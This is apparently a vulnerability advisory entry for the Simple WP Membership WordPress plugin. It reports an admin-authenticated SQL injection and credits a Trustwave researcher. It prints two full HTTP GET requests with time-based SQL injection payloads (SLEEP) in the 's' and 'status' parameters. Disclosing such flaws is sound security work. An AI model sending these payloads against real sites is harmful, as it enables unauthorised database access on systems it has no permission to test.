The plugin did not properly sanitise user input before using it in SQL queries in the admin backend, leading to authenticated (admin+) SQL injections
GET /wp/wp-admin/admin.php?status=&membership_level=&s=hhhh%27%20OR%20SLEEP%281%29%20OR%20first_name%20LIKE%20%27%25i%0A&page=simple_wp_membership HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wp/wp-admin/admin.php?page=simple_wp_membership Connection: keep-alive Cookie: [admin cookies] Upgrade-Insecure-Requests: 1 In addition to the 's' parameter, the 'status' parameter is similarly vulnerable: GET /wp/wp-admin/admin.php?status=active%27%20AND%20SLEEP%288%29%20AND%20%27a%27%3D%27a&membership_level=&s=&page=simple_wp_membership
Martin Vierula of Trustwave
Yes
2021-04-05 (about 1 years ago)
2021-04-06 (about 1 years ago)
2021-04-07 (about 1 years ago)